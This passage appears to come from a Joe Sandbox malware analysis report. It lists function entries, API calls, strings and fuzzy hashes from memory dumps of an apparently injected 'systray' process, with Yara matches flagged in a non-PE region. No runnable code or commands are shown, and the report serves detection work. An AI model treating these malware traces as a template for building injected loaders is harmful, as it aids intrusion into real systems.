                                  • Source File: 00000008.00000002.3262787316.00000000051D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051D0000, based on PE: true
                                  • Associated: 00000008.00000002.3262787316.00000000052F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.00000000052FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.000000000536E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_51d0000_systray.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 08b8e635e2ab701b6142a73c91e371bcd2c6200862afdcce826ea4e1514b5f43
                                  • Instruction ID: bbb8afe4465f4826b22dfc4031c0f1f40e7c7ae473641efe4bb5774a74b07e21
                                  • Opcode Fuzzy Hash: 08b8e635e2ab701b6142a73c91e371bcd2c6200862afdcce826ea4e1514b5f43
                                  • Instruction Fuzzy Hash: 11900236231400020145B558064450B04559BD63613E5C015F6416590CC6B189655721
                                  Function 05242AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3262787316.00000000051D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051D0000, based on PE: true
                                  • Associated: 00000008.00000002.3262787316.00000000052F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.00000000052FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.000000000536E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_51d0000_systray.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 7c631a83e2cc8e281e062627942d5088f99d99ed482f41c4cd0f3094fb5bf402
                                  • Instruction ID: 777744c879e632b9b76b66763f2112f25280fc77b7c47a36fe0435fdbe002c02
                                  • Opcode Fuzzy Hash: 7c631a83e2cc8e281e062627942d5088f99d99ed482f41c4cd0f3094fb5bf402
                                  • Instruction Fuzzy Hash: 75900236221400030105B558074450700568BD53613A5C021F6015550CD6B189615521
                                  Function 052435C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3262787316.00000000051D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051D0000, based on PE: true
                                  • Associated: 00000008.00000002.3262787316.00000000052F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.00000000052FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.000000000536E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_51d0000_systray.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 509a1d5d4a29d4af9e4528b758ef0b9141c821a87f4e3d6628cae745cd066949
                                  • Instruction ID: 2ae35a9485c4be0cab3e0ba6d494fd849f28067af58212ddba50e5b29bffdabc
                                  • Opcode Fuzzy Hash: 509a1d5d4a29d4af9e4528b758ef0b9141c821a87f4e3d6628cae745cd066949
                                  • Instruction Fuzzy Hash: 9590023261550402D1007158455470610158BD0211FB5C411B5424568D87E58A5169A2
                                  Function 052439B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3262787316.00000000051D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051D0000, based on PE: true
                                  • Associated: 00000008.00000002.3262787316.00000000052F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.00000000052FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.000000000536E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_51d0000_systray.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 1c30297fb421372aeb9e55a779d75eac88f3fde9854ff77694b4d0b9a3e97112
                                  • Instruction ID: a6abf64bd8281f1d8769613c62486b67f7c6bc54980876f650b59544e1eeb75f
                                  • Opcode Fuzzy Hash: 1c30297fb421372aeb9e55a779d75eac88f3fde9854ff77694b4d0b9a3e97112
                                  • Instruction Fuzzy Hash: F490023225545102D150715C44446164015ABE0211FA5C021B5814594D85E589556621
                                  Function 03252460 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 104sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • Sleep.KERNELBASE(000007D0), ref: 0325252B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3259951780.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3230000_systray.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep
                                  • String ID: net.dll$wininet.dll
                                  • API String ID: 3472027048-1269752229
                                  • Opcode ID: d512aba3cffa2f3af6232edd08d7b403331b762aee1fda7a6c7d735d3e653744
                                  • Instruction ID: 79baa02e0360b16c43b2564cd6f38b5ebf0311c2c92c4801440e2a6e7466e356
                                  • Opcode Fuzzy Hash: d512aba3cffa2f3af6232edd08d7b403331b762aee1fda7a6c7d735d3e653744
                                  • Instruction Fuzzy Hash: A83181B5611305ABD718DF64D880FEBBBBCAB48704F00462DBA195B284D7B0B784CBA4
                                  Function 0324E545 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 107COMMON
                                  Download Yara Rule
                                  APIs
                                  • CoInitialize.OLE32(00000000), ref: 0324E567
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3259951780.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3230000_systray.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Initialize
                                  • String ID: @J7<
                                  • API String ID: 2538663250-2016760708
                                  • Opcode ID: 30ac404d6963d647cf037612b76559564b3baddfed8e07e9ceeb82e4142de48e
                                  • Instruction ID: ab8b6ab1c5bebf12ea14d27012e78177457a05b12ef990f2a2c909b9a8853571
                                  • Opcode Fuzzy Hash: 30ac404d6963d647cf037612b76559564b3baddfed8e07e9ceeb82e4142de48e
                                  • Instruction Fuzzy Hash: 3F315EB6A1060ADFDB04DFD8C8809EEB7B9FF88304F148559E905EB205D775EA45CBA0
                                  Function 0324E550 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                                  Download Yara Rule
                                  APIs
                                  • CoInitialize.OLE32(00000000), ref: 0324E567
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3259951780.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3230000_systray.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Initialize
                                  • String ID: @J7<
                                  • API String ID: 2538663250-2016760708
                                  • Opcode ID: 799d535091c7ce5c82add9c455a54faae5931890e1558cdee05c72a9911b327c
                                  • Instruction ID: f9bbfe15aa35a6b2f85a76c3016d06fd4dac93ddcb8160221ac30e3e157f254c
                                  • Opcode Fuzzy Hash: 799d535091c7ce5c82add9c455a54faae5931890e1558cdee05c72a9911b327c
                                  • Instruction Fuzzy Hash: 4D314FB5A1020A9FDB04DFD8C8809EEB7B9BF88304F148559E905AB214D771EE45CBA0
                                  Function 03243E50 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 03243EC2
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3259951780.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3230000_systray.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  • Opcode ID: 556ecf4033892e70c448fa113439e915cdceb84abb21a89278d86960d9f6791b
                                  • Instruction ID: 939a923639962aba35de9429e784473875dd329ed45597f2cf8907dbe89dbac5
                                  • Opcode Fuzzy Hash: 556ecf4033892e70c448fa113439e915cdceb84abb21a89278d86960d9f6791b
                                  • Instruction Fuzzy Hash: AC015EB9E1020EBBDF10DAE4DC42F9EB3789F44208F044295AE089B240F670E7948B91
                                  Function 03257CE0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateProcessInternalW.KERNELBASE(?,?,?,?,03247723,00000010,?,?,?,00000044,?,00000010,03247723,?,?,?), ref: 03257D40
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3259951780.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3230000_systray.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  • Opcode ID: 5c53d937018375874fbaaaede2d401b1b2a716e0ab39d6b2e4bdb051aee2d982
                                  • Instruction ID: 3af026d5feb5d41782044c0c5b16b3624c7112f73ecde45479e5914faa7ae2b6
                                  • Opcode Fuzzy Hash: 5c53d937018375874fbaaaede2d401b1b2a716e0ab39d6b2e4bdb051aee2d982
                                  • Instruction Fuzzy Hash: 7501CCB6214608BBCB04DE99DC80EEB77EDAF8C714F018208BA19E7240D670F9518BA4
                                  Function 032395E0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03239622
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3259951780.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3230000_systray.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateThread
                                  • String ID:
                                  • API String ID: 2422867632-0
                                  • Opcode ID: 8d37e3e2df3c6cf4b08c4a792e18c723c668f66bd5e3bafbe6933bf826dd6b36
                                  • Instruction ID: 4003bce5cec54872e5f3e3fd37bbda65a8d58bdae2554ff139571f9a31c11de5
                                  • Opcode Fuzzy Hash: 8d37e3e2df3c6cf4b08c4a792e18c723c668f66bd5e3bafbe6933bf826dd6b36
                                  • Instruction Fuzzy Hash: F4F065B73A07043AE231B1AA9C02FD7B39CCB85B61F140525FB0CEF1C0D9E2B58142A5
                                  Function 032395DD Relevance: 1.5, APIs: 1, Instructions: 35threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03239622
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3259951780.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3230000_systray.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateThread
                                  • String ID:
                                  • API String ID: 2422867632-0
                                  • Opcode ID: 65b8f4a157edbf36d4ea3283b5e9a0c1dd89da2dda4e5c7f7192d24579ddccb2
                                  • Instruction ID: ced23eddd25e8fab39b81bbfa6a3dc1e23d235c8942f663bd1b39d72f8949011
                                  • Opcode Fuzzy Hash: 65b8f4a157edbf36d4ea3283b5e9a0c1dd89da2dda4e5c7f7192d24579ddccb2
                                  • Instruction Fuzzy Hash: E1F09BB72907003AE231A2758C42FEB775C8F85750F144518FB49EF1C0D9E2B58247A5
                                  Function 03257C00 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RtlAllocateHeap.NTDLL(03241109,?,03254077,03241109,03253F77,03254077,?,03241109,03253F77,00001000,?,?,032594A3), ref: 03257C3C
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3259951780.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3230000_systray.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: 72d9412c0a8a6ad336be9107f983141fa821af57217565be2581133eebb49ae6
                                  • Instruction ID: 8a08cab6ab98f73add5819b82a9c046c1b20a7773de46872f7c0b8c57cb899e3
                                  • Opcode Fuzzy Hash: 72d9412c0a8a6ad336be9107f983141fa821af57217565be2581133eebb49ae6
                                  • Instruction Fuzzy Hash: EDE065B6200314BBCA10EE58DC40FAB37ACEFC9710F004419FA18AB281C6B0B9208AF4
                                  Function 03257C50 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,10FC45C7,00000007,00000000,00000004,00000000,0324373C,000000F4,?,?,?,?,?), ref: 03257C8F
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3259951780.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3230000_systray.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID:
                                  • API String ID: 3298025750-0
                                  • Opcode ID: 84d59ce22b5060dd53ea98227712cc744f387e3927bb92697b2737a782d3167e
                                  • Instruction ID: 724ec9f431f5d2a5c6541632482dc03645769e94aaab742dc251b25853890d24
                                  • Opcode Fuzzy Hash: 84d59ce22b5060dd53ea98227712cc744f387e3927bb92697b2737a782d3167e
                                  • Instruction Fuzzy Hash: 60E065B6300308BFD610EE58DC41FAB37ACEF8A720F004419FA08AB241D6B0B9108AB5
                                  Function 03247760 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetFileAttributesW.KERNELBASE(?,?,000016A8,?,000004D8,00000000), ref: 03247789
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3259951780.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3230000_systray.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AttributesFile
                                  • String ID:
                                  • API String ID: 3188754299-0
                                  • Opcode ID: a73bbe1e507445de89a3fc9570d8f675bf79289e13a84e301cdb17ccaa7dc5c4
                                  • Instruction ID: 8dd3c5b315ab12117cdfd81b79b38d0679cd5fcb75ad5730e957991ac619d9f3
                                  • Opcode Fuzzy Hash: a73bbe1e507445de89a3fc9570d8f675bf79289e13a84e301cdb17ccaa7dc5c4
                                  • Instruction Fuzzy Hash: BBE04FB52607042AFA18A9AC9D85F6633588B4C734F588A50F939DB2E1E679E5828150
                                  Function 0324756F Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetErrorMode.KERNELBASE(00008003,?,?,032413D0,03256697,03253F77,?), ref: 032475A0
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3259951780.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3230000_systray.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: 105bcb55b5bd706d36289aa4a5b2d853fca172142dc42e296d2e8d9e01f570f9
                                  • Instruction ID: aa7b0a540fa228380a4220fccfaeab1a33f576327078284d7afefe68f4bee9e8
                                  • Opcode Fuzzy Hash: 105bcb55b5bd706d36289aa4a5b2d853fca172142dc42e296d2e8d9e01f570f9
                                  • Instruction Fuzzy Hash: DDD02B756A03003EF750F6B4DC02F2933985B80304F04C828B918EF2C1D9A2E1404621
                                  Function 03247570 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetErrorMode.KERNELBASE(00008003,?,?,032413D0,03256697,03253F77,?), ref: 032475A0
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3259951780.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3230000_systray.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: 3b2ebdb530d1730dd1946c930a377f63210a8d71b1cc7e2c8e7710eacb21e7c7
                                  • Instruction ID: 4e7705491ba2d602d6ed4a13245a00b6a1a6218461e55dbb57596f52a29ce919
                                  • Opcode Fuzzy Hash: 3b2ebdb530d1730dd1946c930a377f63210a8d71b1cc7e2c8e7710eacb21e7c7
                                  • Instruction Fuzzy Hash: 14D05EB56A03043BF650F6A5DC12F16328C5B44755F048824BA18EF2C2E9A6F5504266
                                  Function 032405DB Relevance: 1.5, APIs: 1, Instructions: 21threadwindowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • PostThreadMessageW.USER32(?,00000111), ref: 032405E7
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3259951780.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3230000_systray.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID:
                                  • API String ID: 1836367815-0
                                  • Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                  • Instruction ID: c732331e459fa3bdb3e636879333281ed13c6297cee527e43e3f36b6bb096fb2
                                  • Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                  • Instruction Fuzzy Hash: 86D023B774000D35E60185C46CC1CFFF71CEB846A5F004063FF09D2040D5254D0207B1
                                  Function 05242C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3262787316.00000000051D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051D0000, based on PE: true
                                  • Associated: 00000008.00000002.3262787316.00000000052F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.00000000052FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.000000000536E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_51d0000_systray.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 3cbf1d500f53e765f4666ba6aed9def5b4f481d1256fe37590dbfb6fe802c541
                                  • Instruction ID: 5fc6cb08c75970baed94e82b66eaacf01647ab007af4d8ab521efd59c497f215
                                  • Opcode Fuzzy Hash: 3cbf1d500f53e765f4666ba6aed9def5b4f481d1256fe37590dbfb6fe802c541
                                  • Instruction Fuzzy Hash: 4FB09B739115D5C5DA15E7604608B2779117FD0711F66C061F3070641E47B8C1D1E975

                                  Non-executed Functions

                                  Function 04FC053E Relevance: .1, Instructions: 149COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3262372879.0000000004FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4fc0000_systray.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 51ed14cc526e5127dadeffc6239bf5afa588e6495a100f2c379bf902b7e479ed
                                  • Instruction ID: a33b2765944197175c687c0fea97fc93537703c7cfb93dd62738b70852f85706
                                  • Opcode Fuzzy Hash: 51ed14cc526e5127dadeffc6239bf5afa588e6495a100f2c379bf902b7e479ed
                                  • Instruction Fuzzy Hash: 6F41F831918B0A8FD358EFA99581676B3E2FB85304F50092DD98AC3252EE71F8478689
                                  Function 0323DB5B Relevance: .0, Instructions: 18COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3259951780.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_3230000_systray.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dfb2033b5b65b43102b77a700b2ff6577f2210c76317f9a4294878d8a19066ea
                                  • Instruction ID: a42fa6a9daf709d743a2a7c4fb30ae071c85ec4f4fac91bd1851b9973e971010
                                  • Opcode Fuzzy Hash: dfb2033b5b65b43102b77a700b2ff6577f2210c76317f9a4294878d8a19066ea
                                  • Instruction Fuzzy Hash: DAC08C27E2410006C1121A7AA4821F0F334D3E7729F2437FBE848AB102A213C0070398
                                  Function 04FCB719 Relevance: 57.7, Strings: 46, Instructions: 215COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3262372879.0000000004FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4fc0000_systray.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                  • API String ID: 0-3754132690
                                  • Opcode ID: 8a9ab72d36a62a47a0c0bca3e77863258ee5000bf82dce1200c7f3fa80e8b013
                                  • Instruction ID: 8c91a84151325a59de1fb8961405a06f0b6cc31255d395b2d2909edf1b9a3615
                                  • Opcode Fuzzy Hash: 8a9ab72d36a62a47a0c0bca3e77863258ee5000bf82dce1200c7f3fa80e8b013
                                  • Instruction Fuzzy Hash: 019161F04483998AC7158F54A1612AFFFB1EBC6305F15816DE7E6BB243C3BE89058B85
                                  Function 04FC2CE9 Relevance: 21.3, Strings: 17, Instructions: 54COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3262372879.0000000004FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4fc0000_systray.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 9',$!#,7$!9$,$"9'7$&&9'$7@X@$7YC7$7ea-$>7{~$?@~y$Ce~s$Zxm~$rt|x$ryc8$sx`d${{v8$|r7P
                                  • API String ID: 0-3322164083
                                  • Opcode ID: c1485e9835161c09c512d7cc932c4f9d0187cd90aa4ca4efe3efe7eb0ab5a807
                                  • Instruction ID: 15725d0a1c795d45b1122548bec28ec2f34dff443cc294a3ab5b0bdbeada8364
                                  • Opcode Fuzzy Hash: c1485e9835161c09c512d7cc932c4f9d0187cd90aa4ca4efe3efe7eb0ab5a807
                                  • Instruction Fuzzy Hash: FE1149B0C0468D9ADF14DFD9E5806DEBFB0FB04344FA04158C459AF256DB755A42CF89
                                  Function 05242890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3262787316.00000000051D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051D0000, based on PE: true
                                  • Associated: 00000008.00000002.3262787316.00000000052F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.00000000052FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.000000000536E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_51d0000_systray.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  • Opcode ID: dac7150387528ef217daf99f59254604208a43e072d29876ba5e0a229cfb46e9
                                  • Instruction ID: 3e2c6f3ca6bcac97588f7eb07c6a9cfd84af496224b708174911c6709ed7a831
                                  • Opcode Fuzzy Hash: dac7150387528ef217daf99f59254604208a43e072d29876ba5e0a229cfb46e9
                                  • Instruction Fuzzy Hash: 3151B7B5A24116FFCB24DF9988D097EFBB9BF08200F548269F569D7641D374DE408BA0
                                  Function 052B2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3262787316.00000000051D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051D0000, based on PE: true
                                  • Associated: 00000008.00000002.3262787316.00000000052F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.00000000052FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.000000000536E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_51d0000_systray.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  • Opcode ID: e8e542035500e42632a8474fc9d2d8345208b348bc779e1f8e6949a19c2bcd77
                                  • Instruction ID: 50171a4a6ca9fe628b4a146d362dc7a3602a2ab67ad5ae1bccd7d8a8769f9164
                                  • Opcode Fuzzy Hash: e8e542035500e42632a8474fc9d2d8345208b348bc779e1f8e6949a19c2bcd77
                                  • Instruction Fuzzy Hash: 2E513679A10746EEEB34DE5CC8809BFB7FAEF44340B048819E5EAD7641D6F4EA408760
                                  Function 05237630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                  Download Yara Rule
                                  Strings
                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 05274787
                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 05274742
                                  • ExecuteOptions, xrefs: 052746A0
                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 052746FC
                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 05274725
                                  • Execute=1, xrefs: 05274713
                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 05274655
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3262787316.00000000051D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051D0000, based on PE: true
                                  • Associated: 00000008.00000002.3262787316.00000000052F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.00000000052FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3262787316.000000000536E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_51d0000_systray.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                  • API String ID: 0-484625025
                                  • Opcode ID: 663b2847deea29b617c36a800c344c972585614f7d510b62ef67c49e9001e9f5
                                  • Instruction ID: 708e160e3ffc8d69a0809b807ee939fe0949fc1433b77654866eaca1c6375685
                                  • Opcode Fuzzy Hash: 663b2847deea29b617c36a800c344c972585614f7d510b62ef67c49e9001e9f5
                                  • Instruction Fuzzy Hash: 8F51F6F176021A7ADF14EBA4EC9AFBA77A9FF04314F0800A9E509A7190DB709B45CF50
                                  Function 052D6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3262787316.00000000051D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051D0000, based on PE: true
